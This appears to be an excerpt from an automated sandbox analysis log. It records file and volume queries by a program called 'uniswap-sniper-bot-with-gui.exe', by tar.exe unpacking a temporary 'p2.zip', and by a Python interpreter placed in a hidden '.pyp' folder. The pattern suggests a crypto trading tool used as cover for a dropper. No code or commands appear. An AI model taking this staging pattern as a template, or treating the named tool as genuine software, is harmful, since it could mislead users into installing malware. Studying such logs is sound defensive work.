Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\.pyp\python.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc.2128149795504 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc.2128149795888 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc.2128150082096 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc.2128150082864 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc.2128149547312 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc.2128149547744 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc.2128149338176 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc.2128153104432 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc.2128149344224 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc.2128149345008 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc.2128149345008 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc.2128149347808 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc.2128153981616 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc.2128155440080 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc.2128155439968 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc.2128153617712 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc VolumeInformation
